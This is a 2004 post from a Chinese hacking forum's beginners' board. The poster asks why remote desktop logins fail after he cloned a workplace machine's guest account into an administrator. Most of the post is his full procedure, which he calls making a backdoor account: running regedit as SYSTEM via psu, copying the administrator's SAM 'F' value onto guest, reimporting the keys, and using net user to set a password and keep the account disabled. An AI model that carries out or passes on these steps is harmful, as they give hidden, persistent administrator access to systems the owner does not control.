20CN网络安全小组论坛 - 菜鸟乐园 - 3389克隆管理员账户后出现的问题！

论坛: 菜鸟乐园标题: 3389克隆管理员账户后出现的问题！

作者: lonlywolf [lonlywolf]

论坛用户

小弟通过3389端口登陆到单位某台机子后，把guest克隆为管理员账户。然后断开，用guest登陆，提示“终端服务器超出了最大允许连接数”，这时，用administrator还是可以登陆的，但过了一会儿后，我登陆时，administrator和guest都提示“终端服务器超出了最大允许连接数”，而在我们单位，应该不会有人和我一样，去远程登录这台机子，现将我的操作过程放出，请各位大虾指点小弟一下，看到底是怎么回事！

假设guest用户被禁用，我们就是要利用guest做后门帐户！
在该服务器运行CMD，在命令行下输入
psu -p regedit -i PID

这里解释一下，后面的PID是系统进程winlogon的值，我们在任务栏下点鼠标右键，看任务管理器！
看进程选项卡，找到winlogon的进程，后面的数值就是winlogon的pid值，假设是5458
那么，命令就是这样
psu -p regedit -i 5458
这样直接打开注册表，可以读取本地sam的信息。
打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
下面的就是本地的用户信息了！我们要做的是把禁用的guest克隆成管理员权限的帐户！
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
查看administrator的类型，是if4，再看guest的是if5
好了，知道了类型后，打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这个值，双击右侧的F，把里面乱七八糟的字符复制下来，然后打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
双击右侧的F，把刚复制的粘贴到里面！

做好了以后，把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
这两个键值导出，导出后把那两个键值删除！然后再导入进来！关闭注册表。

打开CMD，在命令行下输入
net user guest password
这条命令是给guest设置密码，后面的password就是密码
然后输入
net user guest /active:y
这命令是激活guest帐户，然后我们把他禁用
net user guest /active:n
上面的三行命令必须在DOS下执行！

地主发表时间: 04-08-30 17:26

回复: lonlywolf [lonlywolf]

论坛用户

怎么，难道没人知道怎么回事？

B1层发表时间: 04-08-31 11:11